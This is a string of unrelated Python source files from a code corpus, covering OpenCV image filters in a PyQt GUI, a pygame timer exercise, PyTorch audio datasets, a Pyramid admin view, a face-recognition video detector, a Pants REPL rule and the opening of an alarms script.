cv2.morphologyEx(gray, cv2.MORPH_HITMISS, kernel)\n        self.displayImage(2)\n\n    def gradient(self):\n        self.image = self.tmp\n        kernel = np.ones((5, 5), np.uint8)\n        self.image = cv2.morphologyEx(self.image, cv2.MORPH_GRADIENT, kernel)\n        self.displayImage(2)\n\n    def morboundary(self):\n        self.image = self.tmp\n        se = np.ones((3, 3), np.uint8)\n        e1 = self.image - cv2.erode(self.image, se, iterations=1)\n        self.image = e1\n        self.displayImage(2)\n\n    def convex(self):\n        self.image = self.tmp\n        self.image = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n        blur = cv2.blur(self.image, (3, 3))\n        ret, thresh = cv2.threshold(blur, 50, 255, cv2.THRESH_BINARY)\n\n        im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n        hull = []\n\n        # calculate points for each contour\n        for i in range(len(contours)):\n            # creating convex hull object for each 
contour\n hull.append(cv2.convexHull(contours[i], False))\n\n # create an empty black image\n self.image = np.zeros((thresh.shape[0], thresh.shape[1], 3), np.uint8)\n\n # draw contours and hull points\n for i in range(len(contours)):\n color_contours = (0, 255, 0) # green - color for contours\n color = (255, 0, 0) # blue - color for convex hull\n # draw ith contour\n #cv2.drawContours( self.image, contours, i, color_contours, 1, 8, hierarchy)\n # draw ith convex hull object\n cv2.drawContours( self.image, hull, i, color, 1, 8)\n self.displayImage(2)\n\n ################# Chương 8 ##############################################################################\n def Sobel(self):\n if self.sobel.isChecked():\n self.image = self.tmp\n if self.sobel_x.isChecked():\n self.image = cv2.Sobel(self.image, cv2.CV_8U, 1, 0, ksize=5)\n if self.sobel_y.isChecked():\n self.image = cv2.Sobel(self.image, cv2.CV_8U, 0, 1, ksize=5)\n self.displayImage(2)\n def x_Sobel(self):\n self.image = self.tmp\n im = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n self.image = cv2.Sobel(im, cv2.CV_8U, 1, 0, ksize=5)\n\n self.displayImage(2)\n\n def y_Sobel(self):\n self.image = self.tmp\n im = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n self.image = cv2.Sobel(im, cv2.CV_8U, 0, 1, ksize=5)\n\n self.displayImage(2)\n\n def sobel_Laplacian(self):\n self.image = self.tmp\n im = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n self.image = cv2.Laplacian(im, cv2.CV_8U)\n\n self.displayImage(2)\n\n def lap_of_Gaussian(self):\n self.image = self.tmp\n im = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(im, (5, 5), 0)\n self.image = cv2.Laplacian(blur, cv2.CV_8U, ksize=5)\n\n self.displayImage(2)\n\n def img_Canny(self):\n self.image = self.tmp\n can = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n self.image = cv2.Canny(can, 100, 200)\n self.displayImage(2)\n\n def Canny(self):\n self.image = self.tmp\n if self.canny.isChecked():\n can = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n self.image = cv2.Canny(can, self.canny_min.value(), self.canny_max.value())\n self.displayImage(2)\n\napp = QApplication(sys.argv)\nwin = LoadQt()\nwin.show()\nsys.exit(app.exec())\n\n","sub_path":"Pyqt5ui.py","file_name":"Pyqt5ui.py","file_ext":"py","file_size_in_byte":17207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"626401906","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 05 08:07:25 2018\r\n\r\n@author: quillot/costa\r\n\"\"\"\r\n\r\nimport pygame as pg\r\nimport datetime\r\n#initialisation de Pygame\r\npg.init()\r\n#création de la fenêtre d'affichage\r\nscreen = pg.display.set_mode((800,250))\r\n#création des rectangles : boutons et segments\r\ns0 = pg.Rect(370,25,360,75)\r\nb0 = pg.Rect(50,15,200,25)\r\nb1 = pg.Rect(50,65,200,25)\r\nb2 = pg.Rect(50,115,200,25)\r\nb3 = pg.Rect(50,165,200,25)\r\nb4 = pg.Rect(50,215,200,25)\r\n#mise des rectangles dans des listes et état des rectangles : allumés ou éteints\r\nrects = [s0,b0,b1,b2,b3,b4]\r\nbuttons = [b0,b1,b2,b3,b4]\r\n#initialisation de la police pour l'affichage de texte et liste de texte à ajouter sur les boutons\r\nmyfont = pg.font.SysFont(\"monospace\", 20)\r\nlabels = [\"Start\",\"Power\",\"Stop\",\"Plus\",\"Moins\"]\r\ni = 0\r\npg.draw.rect(screen,(0,174,0),b0)\r\npg.draw.rect(screen,(237,255,0),b1)\r\npg.draw.rect(screen,(255,0,0),b2)\r\npg.draw.rect(screen,(237,255,0),b3)\r\npg.draw.rect(screen,(237,255,0),b4)\r\n#Affichage des boutons et reinitialisation de leur état à éteint \r\ni = 
0\r\nfor text in labels:\r\n label = myfont.render(text,1,(0,0,0))\r\n screen.blit(label,(130,17+i*50))\r\n i+=1\r\n\r\nrunning=1\r\nnb=10\r\netat=0\r\nwhile running:\r\n #Detection des évenèments utilisateurs \r\n for event in pg.event.get():\r\n if event.type == pg.KEYDOWN:\t\t\t\r\n print(event)\r\n if event.key == pg.K_ESCAPE:\r\n running = 0 \r\n pg.quit()\r\n #Enregistrement des coordonnées de la souris si il y a eu un clique \r\n if event.type == pg.MOUSEBUTTONDOWN:\r\n mcoords = pg.mouse.get_pos()\r\n #création d'un mini rect 1x1 à cet emplacement puis test de collision avec les boutons\r\n mouse_rect = pg.Rect(mcoords[0],mcoords[1],1,1) \r\n i = 0\r\n for button in buttons:\r\n if mouse_rect.colliderect(button):\r\n #si bouton autre que clear alors on regarde quel bouton est touché\r\n pressed = labels[i]\r\n nb = i\r\n print(pressed)\r\n print(nb)\r\n i+=1 \t\t\t\t\t\t\t\t\t\r\n mcoords = (0,0)\r\n if etat==0 and nb==1:\r\n etat=1\r\n fin = datetime.datetime.now() + datetime.timedelta(0,3)\r\n nb=10\r\n if etat==1 and (nb==1 or datetime.datetime.now().time()>fin.time()):\r\n etat=0\r\n nb=10\r\n\r\n if etat==0:\r\n pg.draw.rect(screen,(255,0,0),s0)\r\n label = myfont.render(\"INIT\",1,(0,0,0))\r\n screen.blit(label,(500,30))\r\n label = myfont.render(\"00:00\",1,(0,0,0))\r\n screen.blit(label,(510,60))\r\n if etat==1:\r\n pg.draw.rect(screen,(0,174,0),s0)\r\n label = myfont.render(\"MODE PUISSANCE\",1,(0,0,0))\r\n screen.blit(label,(500,30))\r\n duree=fin-datetime.datetime.now()\r\n label = myfont.render(str(duree)[3:7],1,(0,0,0))\r\n screen.blit(label,(510,60))\r\n if etat==2:\r\n pg.draw.rect(screen,(237,255,0),s0)\r\n label = myfont.render(\"Pause\",1,(0,0,0))\r\n screen.blit(label,(510,30))\r\n label = myfont.render(\"00:00\",1,(0,0,0))\r\n screen.blit(label,(510,60))\r\n pg.display.update()\r\n","sub_path":"TD/old/TD13/sequentiel_simple.py","file_name":"sequentiel_simple.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"76319179","text":"from django.core.management.base import NoArgsCommand\nimport timeside\n\n\nclass Command(NoArgsCommand):\n def handle_noargs(self, **options):\n try:\n audio_file = '/home/fergalm/Dropbox/Private/deepsouthsounds.com/working/sample.mp3'\n decoder = timeside.decoder.FileDecoder(audio_file)\n grapher = timeside.grapher.Spectrogram(width=1920, height=1080)\n (decoder | grapher).run()\n grapher.render('d:\\spectrogram.png')\n\n except Exception as ex:\n print(\"Debug exception: %s\" % ex)","sub_path":"spa/management/commands/__timeside_waveforms.py","file_name":"__timeside_waveforms.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"112909335","text":"import os\nimport sys\nimport pickle\n\nimport numpy as np\nimport torch\nfrom torch.utils.data.dataset import Dataset\nfrom torch.utils.data import DataLoader\n\nclass SoundDataset(Dataset):\n\n def __init__(self, image_dir, dict_dir):\n self.image_dir = image_dir\n self.dict_dir = dict_dir\n self.spectrograms = []\n self.labels = []\n\n # Load files\n self.files = os.listdir(image_dir)\n\n # Convert class ids to target index (5_class_100.pkl)\n # class2id = {\n # '/m/02sgy' : 0,\n # '/m/03xq_f' : 1,\n # '/m/07gql' : 2,\n # '/m/07y_7' : 3,\n # '/m/0l14j_' : 4\n # }\n\n\n # Convert class ids to target index (5_class_1000.pkl)\n class2id = {\n '/m/02hnl' : 0, # Drum\n '/m/042v_gx': 1, # Acoustic Guitar\n 
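
# --------------------------------------------------------------------------
# Illustrative sketch (not from the dataset.py record in progress): how a
# map-style Dataset such as SoundDataset is typically consumed.  Batching
# relies on every spectrogram sharing one shape -- which is exactly why the
# record above filters on spect.shape == (1025, 431).  All names here are
# hypothetical stand-ins.
import numpy as np
import torch
from torch.utils.data import DataLoader, Dataset

class ToySpectrograms(Dataset):
    """Stand-in for SoundDataset: fixed-shape arrays plus integer labels."""
    def __init__(self, n=8):
        self.x = [np.random.rand(1025, 431).astype(np.float32) for _ in range(n)]
        self.y = [i % 5 for i in range(n)]
    def __len__(self):
        return len(self.x)
    def __getitem__(self, idx):
        return self.x[idx], self.y[idx]

loader = DataLoader(ToySpectrograms(), batch_size=4, shuffle=True)
for xb, yb in loader:            # default collate stacks same-shape arrays
    print(xb.shape, yb)          # torch.Size([4, 1025, 431]) tensor([...])
    break
# --------------------------------------------------------------------------
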
'/m/07y_7' : 2, # Violin, fiddle\n '/m/07xzm' : 3, # Ukelele\n '/m/0dwtp' : 4 # Glockenspiel\n }\n\n # Open dictionary\n with open(dict_dir, 'rb') as handle:\n self.labeldict = pickle.load(handle)\n\n # Create targets\n for self.file_name in self.files: # [:int(0.03*len(self.files))]:\n if self.file_name.split('.')[1] == 'npy':\n self.spect = np.load(self.image_dir + self.file_name)\n if self.spect.shape == (1025, 431):\n self.labels.append(class2id[self.labeldict[self.file_name[:-4]]])\n self.spectrograms.append(self.file_name)\n\n def __len__(self):\n return len(self.spectrograms)\n\n # Returns a single input-target pair\n def __getitem__(self, idx):\n\n filename = self.image_dir + self.spectrograms[idx]\n spectrogram = np.load(filename)\n\n return spectrogram, self.labels[idx]\n\nclass CustomMnistDataset(Dataset):\n\n def __init__(self, image_dir):\n self.image_dir = image_dir\n self.images = []\n self.labels = []\n\n # Load files\n self.files = os.listdir(image_dir)\n\n # Create targets\n for self.file_name in self.files: # [:int(0.03*len(self.files))]:\n if self.file_name.split('.')[1] == 'npy':\n self.labels.append(int(self.file_name.split('_')[0]))\n self.images.append(self.file_name)\n\n def __len__(self):\n return len(self.images)\n\n # Returns a single input-target pair\n def __getitem__(self, idx):\n\n filename = self.image_dir + self.images[idx]\n image = np.load(filename)\n\n return image, self.labels[idx]\n","sub_path":"src/CleanCode/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136968887","text":"from functools import partial\nfrom pyramid.view import view_defaults\nfrom pyramid.view import view_config\n\nimport colander\nfrom sqlalchemy import select\nfrom sqlalchemy.orm import subqueryload\nfrom sqlalchemy.sql.functions import concat\nfrom c2cgeoform.ext.deform_ext import RelationCheckBoxListWidget\nfrom c2cgeoform.schema import (\n GeoFormSchemaNode,\n GeoFormManyToManySchemaNode,\n manytomany_validator,\n)\nfrom c2cgeoform.views.abstract_views import ListField\n\nfrom c2cgeoportal_commons.models.main import Theme, Interface, Role, Functionality\nfrom c2cgeoportal_admin.schemas.treegroup import children_schema_node\nfrom c2cgeoportal_admin.schemas.metadata import metadatas_schema_node\nfrom c2cgeoportal_admin.views.treeitems import TreeItemViews\n\n_list_field = partial(ListField, Theme)\n\nbase_schema = GeoFormSchemaNode(Theme)\n\nbase_schema.add(children_schema_node(only_groups=True))\n\nbase_schema.add(\n colander.SequenceSchema(\n GeoFormManyToManySchemaNode(Functionality),\n name='functionalities',\n widget=RelationCheckBoxListWidget(\n select([\n Functionality.id,\n concat(Functionality.name, '=', Functionality.value).label('label')\n ]).alias('functionnality_labels'),\n 'id',\n 'label',\n order_by='label'\n ),\n validator=manytomany_validator\n )\n)\n\nbase_schema.add(\n colander.SequenceSchema(\n GeoFormManyToManySchemaNode(Role),\n name='restricted_roles',\n widget=RelationCheckBoxListWidget(\n Role,\n 'id',\n 'name',\n order_by='name'\n ),\n validator=manytomany_validator\n )\n)\n\nbase_schema.add(\n colander.SequenceSchema(\n GeoFormManyToManySchemaNode(Interface),\n name='interfaces',\n widget=RelationCheckBoxListWidget(\n Interface,\n 'id',\n 'name',\n order_by='name'\n ),\n validator=manytomany_validator\n )\n)\n\nbase_schema.add(metadatas_schema_node.clone())\n\n\n@view_defaults(match_param='table=themes')\nclass 
ThemeViews(TreeItemViews):\n\n _list_fields = TreeItemViews._list_fields + [\n _list_field('ordering'),\n _list_field('public'),\n _list_field('icon'),\n _list_field(\n 'functionalities',\n renderer=lambda themes: ', '.join(\n ['{}={}'.format(f.name, f.value)\n for f in sorted(themes.functionalities, key=lambda f: f.name)]),\n filter_column=concat(Functionality.name, '=', Functionality.value)\n ),\n _list_field(\n 'restricted_roles',\n renderer=lambda themes: ', '.join([r.name or '' for r in themes.restricted_roles]),\n filter_column=Role.name\n ),\n _list_field(\n 'interfaces',\n renderer=lambda themes: ', '.join(\n [i.name or '' for i in sorted(themes.interfaces, key=lambda i: i.name)]),\n filter_column=Interface.name\n )] + TreeItemViews._extra_list_fields\n\n _id_field = 'id'\n _model = Theme\n _base_schema = base_schema\n\n def _base_query(self, query=None):\n return super()._base_query(\n self._request.dbsession.query(Theme).distinct().\n outerjoin('interfaces').\n outerjoin('restricted_roles').\n outerjoin('functionalities').\n options(subqueryload('functionalities')).\n options(subqueryload('restricted_roles')).\n options(subqueryload('interfaces')))\n\n @view_config(route_name='c2cgeoform_index',\n renderer='../templates/index.jinja2')\n def index(self):\n return super().index()\n\n @view_config(route_name='c2cgeoform_grid',\n renderer='json')\n def grid(self):\n return super().grid()\n\n @view_config(route_name='c2cgeoform_item',\n request_method='GET',\n renderer='../templates/edit.jinja2')\n def view(self):\n return super().edit()\n\n @view_config(route_name='c2cgeoform_item',\n request_method='POST',\n renderer='../templates/edit.jinja2')\n def save(self):\n return super().save()\n\n @view_config(route_name='c2cgeoform_item',\n request_method='DELETE')\n def delete(self):\n return super().delete()\n\n @view_config(route_name='c2cgeoform_item_action',\n request_method='GET',\n renderer='../templates/edit.jinja2')\n def duplicate(self):\n return super().duplicate()\n","sub_path":"admin/c2cgeoportal_admin/views/themes.py","file_name":"themes.py","file_ext":"py","file_size_in_byte":4573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"31750849","text":"from model import Model\nimport torch\nfrom skimage import measure\nimport os\nimport numpy as np\nfrom tqdm import tqdm\nimport wandb\n\napi = wandb.Api()\n\n\ndef get_accs(level, task, strategy):\n runs = get_runs(level, task, strategy)\n if not len(runs) > 0:\n return np.nan\n accs = [predict(run, level, task) for run in runs]\n return np.mean(accs)\n\n\ndef get_runs(level, task, strategy):\n runs = api.runs(\"colin-cooke/ctc\", {\n \"$and\": [{\"state\": \"finished\"}, {\"config.task\": task},\n {\"config.level\": level}, {\"config.init_strategy\": strategy}]})\n ids = []\n for run in tqdm(runs):\n hist = run.history(pandas=False)\n val_losses = [h['val_loss'] for h in hist]\n if len(val_losses) != 75:\n continue\n ids.append(run.id)\n return ids\n\n\ndef predict(run_id, level, task):\n model_path = f'/hddraid5/data/colin/ctc/models/model_{run_id}.pth'\n unet_path = f'/hddraid5/data/colin/ctc/models/net_0_{run_id}.pth'\n model = Model(num_heads=1, batch_norm=True)\n model_state = torch.load(model_path)\n unet_state = torch.load(unet_path)\n model.load_state_dict(model_state)\n model.nets[0].load_state_dict(unet_state)\n # for now we will only ever load test data\n data_dir = '/hddraid5/data/colin/ctc/'\n if task.lower() == 'hela':\n test_data_path = os.path.join(data_dir, 
f'test_x_norm.npy')\n elif task.lower() == 'pan':\n test_data_path = os.path.join(data_dir, 'pan_test_x.npy')\n pass\n else:\n raise RuntimeError\n test_x = torch.from_numpy(np.load(test_data_path, mmap_mode='r'))\n test_amnt = test_x.shape[0]\n batch_size = 4\n indices = np.arange(0, test_amnt, batch_size)\n preds = []\n bits = int(np.log2(level))\n if task == 'pan':\n y_true = np.load(f'/hddraid5/data/colin/ctc/pan_test_{bits}_y.npy')\n else:\n y_true = np.load(f'/hddraid5/data/colin/ctc/new_nuc_test_kb{bits}.npy')\n for index in tqdm(indices):\n test_x_batch = test_x[index:index + batch_size].float()\n with torch.no_grad():\n predictions = model(test_x_batch).cpu().numpy()\n preds.append(predictions[0])\n preds = np.concatenate(preds, axis=0)[:, 0]\n # do rounding based on amount of bits\n preds_rounded = np.round(preds * (level))\n y_true_rounded = np.round(y_true * (level))\n avg_accuracy = np.count_nonzero(preds_rounded == y_true_rounded) / np.prod(preds_rounded.shape)\n return avg_accuracy\n\n\nif __name__ == \"__main__\":\n levels = [2, 4, 8, 16, 32, 64, 128]\n tasks = ['pan']\n strategies = ['dpc', 'learned', 'off_axis', 'all', 'random', 'center']\n strategies = ['dpc', 'off_axis', 'all', 'random', 'center']\n out_dir = os.path.join('/hddraid5/data/colin/ctc/accs')\n os.makedirs(out_dir, exist_ok=True)\n for task in tasks:\n for strategy in strategies:\n accs = np.array([get_accs(level, task, strategy) for level in levels])\n np.save(os.path.join(out_dir, f'{task}_{strategy}.npy'), accs)\n","sub_path":"calculate_accuracy.py","file_name":"calculate_accuracy.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"38343871","text":"import mxnet as mx\nfrom mxnet import nd\nfrom mtcnn_detector import MtcnnDetector\nimport face_model\nimport cv2\nimport numpy as np\nimport os\nimport argparse\nimport pickle\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom time import time\n\nparser = argparse.ArgumentParser('Face recognition and verification using Insightface')\nparser.add_argument('--image-size', type=str, default='112,112')\nparser.add_argument('--faces-dir', type=str, default='../resources/faces')\nparser.add_argument('--model', type=str, default='../models/model-r100-ii/model,0')\nparser.add_argument('--in-file', type=str, default='../resources/variete.mp4')\nparser.add_argument('--out-file', type=str, default='../resources/face_variete.mp4')\nparser.add_argument('--ga-model', type=str, default='')\nparser.add_argument('--gpu', type=int, default=-1)\nparser.add_argument('--det', type=int, default=0)\nparser.add_argument('--flip', type=int, default=0)\nparser.add_argument('--threshold', type=float, default=1.24)\nparser.add_argument('--threshold-face', type=float, default=0.4)\nparser.add_argument('--prepare', action='store_true', help='This is a boolean')\nparser.add_argument('--recognize', action='store_true', help='Temporary flag to test only face identification')\n\n\ndef hex2rgb(h):\n return tuple(int(h[i:i + 2], 16) for i in (0, 2, 4))\n\n\nbox_colors = ['a50104', '261c15', 'ff01fb', '2e1e0f', '003051', 'f18f01', '6e2594']\nbox_colors = [hex2rgb(h) for h in box_colors]\n\n\nclass VideoDetector(object):\n def __init__(self, arguments, mx_context):\n self.args = arguments\n self.ctx = mx_context\n self.model = face_model.FaceModel(args)\n self.detector = MtcnnDetector(model_folder='mtcnn-model/', ctx=self.ctx, num_worker=4, accurate_landmark=False)\n self.names = None # 
Names of the persons in the dataset\n self.dataset = None # Collection of features of known names\n\n def prepare_faces(self, dataset_name='dataset.pkl'):\n image_names = os.listdir(self.args.faces_dir)\n face_names = set([x.split('_')[0] for x in image_names])\n\n dataset = {}\n for name in face_names:\n images = [cv2.imread(os.path.join(self.args.faces_dir, iname)) for iname in image_names if name in iname]\n features = [self.model.get_feature(self.model.get_input(img)) for img in images]\n features = np.stack(features)\n dataset[name] = features\n\n dataset_path = os.path.abspath(os.path.join(self.args.faces_dir, '..'))\n\n with open(dataset_path + '/'+dataset_name, 'wb') as f:\n pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)\n\n def detect(self):\n if self.dataset is None:\n self.load_features()\n cap = cv2.VideoCapture(args.in_file) # Create a VideoCapture object\n frame_w, frame_h = int(cap.get(3)), int(cap.get(4)) # Convert resolutions from float to integer.\n\n total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n renders = []\n\n frame_time = np.array([])\n for _ in tqdm(range(total_frames)):\n start = time()\n ret, frame = cap.read()\n if ret:\n render = self.detect_faces(frame)\n renders.append(render)\n frame_time = np.append(frame_time, time() - start)\n cap.release()\n return renders, {'w': frame_w, 'h': frame_h}, {'fr_exec': frame_time.mean()}\n\n def load_features(self, dataset_name='dataset.pkl'):\n dataset_path = os.path.abspath(os.path.join(self.args.faces_dir, '..'))\n with open(dataset_path + '/' + dataset_name, 'rb') as f: # Load Dataset on numpy format\n np_dataset = pickle.load(f)\n # Create dictionary with person names and their corresponding feature index\n self.names = {}\n i = 0\n for k, v in np_dataset.items():\n self.names[k] = slice(i, i + v.shape[0])\n i += v.shape[0]\n # Transform dataset to mx NDarray format\n self.dataset = nd.array(np.concatenate([v for v in np_dataset.values()]), ctx=self.ctx)\n\n def draw_names(self, frame, names):\n # names: dict{'name' : bounding_box}\n colors = box_colors[:len(names)]\n for name, b, c in zip(names.keys(), names.values(), colors):\n if name == 'unknown':\n for x in b:\n cv2.rectangle(frame, (int(x[0]), int(x[1])), (int(x[2]), int(x[3])), colors[-1], 2)\n # cv2.putText(frame, 'unknown', (int(b[0]),int(b[1])), cv2.FONT_HERSHEY_COMPLEX_SMALL, 2, (255, 255, 255), 2, cv2.LINE_AA)\n else:\n cv2.rectangle(frame, (int(b[0]), int(b[1])), (int(b[2]), int(b[3])), c, 2)\n cv2.putText(frame, name, (int(b[0]), int(b[1])), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 3, cv2.LINE_AA)\n return frame\n\n def name_faces(self, persons, total_boxes):\n faces_names = {}\n unknown_faces = []\n for person, box in zip(persons, total_boxes):\n face = self.model.get_input(person)\n if face is None:\n continue\n face = nd.array(self.model.get_feature(face), ctx=self.ctx)\n\n # Calculate the similarity between the known features and the current face feature\n sim = nd.dot(self.dataset, face)\n scores = {}\n for known_id, index in self.names.items():\n scores[known_id] = max(sim[index]).asnumpy()\n\n if max(scores.values()) > self.args.threshold_face:\n faces_names[max(scores, key=scores.get)] = box\n else:\n unknown_faces.append(box)\n\n if len(unknown_faces):\n faces_names['unknown'] = unknown_faces\n\n return faces_names\n\n def detect_faces(self, frame):\n resolution = int(self.args.image_size.split(',')[0])\n # run detector\n results = self.detector.detect_face(frame)\n if results is not None:\n total_boxes = results[0]\n points = 
results[1]\n # extract aligned face chips\n persons = self.detector.extract_image_chips(frame, points, resolution, 0.37)\n if self.args.recognize:\n faces_names = self.name_faces(persons, total_boxes)\n else:\n faces_names = {'unknown': [box for box in total_boxes]}\n return self.draw_names(frame, faces_names)\n\n else:\n return frame\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n\n if args.gpu >= 0:\n print('Using gpu:{}'.format(args.gpu))\n else:\n print('Using cpu')\n\n ctx = mx.gpu(args.gpu) if args.gpu >= 0 else mx.cpu(0)\n vd = VideoDetector(args, ctx)\n\n if args.prepare:\n print('Transforming images from: {}'.format(os.path.abspath(args.faces_dir)))\n vd.prepare_faces()\n print('Features saved on:{}'.format(os.path.abspath(args.faces_dir+'../dataset.pkl')))\n else:\n # Draw square on detected faces, and verify each (optional)\n print('Detecting Faces:')\n rendered_frames, frame_spec, measures = vd.detect()\n\n # Export rendered frames to a video file\n out = cv2.VideoWriter(args.out_file, cv2.VideoWriter_fourcc(*'mp4v'), 30, (frame_spec['w'], frame_spec['h']))\n for v in rendered_frames:\n out.write(v)\n out.release()\n print('Video saved on:{}'.format(os.path.abspath(args.out_file)))\n print('Average execution time per frame: %0.3f seg' % measures['fr_exec'])\n\n\n\n","sub_path":"video_detector.py","file_name":"video_detector.py","file_ext":"py","file_size_in_byte":7503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"144681649","text":"# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom abc import ABC\nfrom dataclasses import dataclass\nfrom pathlib import PurePath\nfrom typing import ClassVar, Dict, Mapping, Optional, Tuple, Type, cast\n\nfrom pants.base.build_root import BuildRoot\nfrom pants.engine.console import Console\nfrom pants.engine.fs import Digest, Workspace\nfrom pants.engine.goal import Goal, GoalSubsystem\nfrom pants.engine.process import InteractiveProcess, InteractiveRunner\nfrom pants.engine.rules import Get, collect_rules, goal_rule\nfrom pants.engine.target import Field, Target, Targets, TransitiveTargets\nfrom pants.engine.unions import UnionMembership, union\nfrom pants.option.global_options import GlobalOptions\nfrom pants.util.contextutil import temporary_dir\nfrom pants.util.frozendict import FrozenDict\nfrom pants.util.meta import frozen_after_init\n\n\n@union\n@dataclass(frozen=True)\nclass ReplImplementation(ABC):\n \"\"\"This type proxies from the top-level `repl` goal to a specific REPL implementation for a\n specific language or languages.\"\"\"\n\n name: ClassVar[str]\n required_fields: ClassVar[Tuple[Type[Field], ...]]\n\n targets: Targets\n\n @classmethod\n def is_valid(cls, tgt: Target) -> bool:\n return tgt.has_fields(cls.required_fields)\n\n\nclass ReplSubsystem(GoalSubsystem):\n \"\"\"Opens a REPL.\"\"\"\n\n name = \"repl\"\n required_union_implementations = (ReplImplementation,)\n\n @classmethod\n def register_options(cls, register) -> None:\n super().register_options(register)\n register(\n \"--shell\",\n type=str,\n default=None,\n help=\"Override the automatically-detected REPL program for the target(s) specified. 
\",\n )\n\n @property\n def shell(self) -> Optional[str]:\n return cast(Optional[str], self.options.shell)\n\n\nclass Repl(Goal):\n subsystem_cls = ReplSubsystem\n\n\n@frozen_after_init\n@dataclass(unsafe_hash=True)\nclass ReplRequest:\n digest: Digest\n binary_name: str\n env: FrozenDict[str, str]\n\n def __init__(\n self, *, digest: Digest, binary_name: str, env: Optional[Mapping[str, str]] = None,\n ) -> None:\n self.digest = digest\n self.binary_name = binary_name\n self.env = FrozenDict(env or {})\n\n\n@goal_rule\nasync def run_repl(\n console: Console,\n workspace: Workspace,\n interactive_runner: InteractiveRunner,\n repl_subsystem: ReplSubsystem,\n transitive_targets: TransitiveTargets,\n build_root: BuildRoot,\n union_membership: UnionMembership,\n global_options: GlobalOptions,\n) -> Repl:\n repl_shell_name = repl_subsystem.shell or \"python\"\n\n implementations: Dict[str, Type[ReplImplementation]] = {\n impl.name: impl for impl in union_membership[ReplImplementation]\n }\n repl_implementation_cls = implementations.get(repl_shell_name)\n if repl_implementation_cls is None:\n available = sorted(implementations.keys())\n console.print_stderr(\n f\"{repr(repl_shell_name)} is not a registered REPL. Available REPLs (which may \"\n f\"be specified through the option `--repl-shell`): {available}\"\n )\n return Repl(-1)\n\n repl_impl = repl_implementation_cls(\n targets=Targets(\n tgt for tgt in transitive_targets.closure if repl_implementation_cls.is_valid(tgt)\n )\n )\n request = await Get(ReplRequest, ReplImplementation, repl_impl)\n\n with temporary_dir(root_dir=global_options.options.pants_workdir, cleanup=False) as tmpdir:\n tmpdir_relative_path = PurePath(tmpdir).relative_to(build_root.path).as_posix()\n exe_path = PurePath(tmpdir, request.binary_name).as_posix()\n workspace.write_digest(request.digest, path_prefix=tmpdir_relative_path)\n result = interactive_runner.run(\n InteractiveProcess(argv=(exe_path,), env=request.env, run_in_workspace=True)\n )\n\n return Repl(result.exit_code)\n\n\ndef rules():\n return collect_rules()\n","sub_path":"src/python/pants/core/goals/repl.py","file_name":"repl.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"531521116","text":"\"\"\"\nBIAC COMPUTE ALARMS LUTOSA\n====================================\n\n\nSends:\n-------------------------------------\n\nListens to:\n-------------------------------------\n\n* /queue/COMPUTE_ALARMS_LUTOSA\n\nCollections:\n-------------------------------------\n\n\n\nVERSION HISTORY\n-------------------------------------\n\n* 31 Oct 2019 0.0.1 **VME** Creation\n* 03 Nov 2019 0.0.2 **VME** Adding text in alarm\n\"\"\"\n\nimport sys\nimport traceback\n\nimport json\nimport time\nimport uuid\nimport json\nimport pytz\nimport base64\nimport tzlocal \nimport urllib3\nimport datetime\nimport platform\nimport threading\nimport os,logging\nimport numpy as np\nimport collections\nimport pandas as pd\nimport datetime as dt\nimport dateutil.parser\nfrom dateutil import tz\nfrom io import StringIO\nfrom functools import wraps\nfrom datetime import datetime\nfrom datetime import timezone\nfrom itertools import groupby\nfrom datetime import timedelta\nfrom tzlocal import get_localzone\nfrom elastic_helper import es_helper \nfrom amqstompclient import amqstompclient\nfrom logging.handlers import TimedRotatingFileHandler\nfrom logstash_async.handler import AsynchronousLogstashHandler\nfrom elasticsearch import Elasticsearch as ES, 
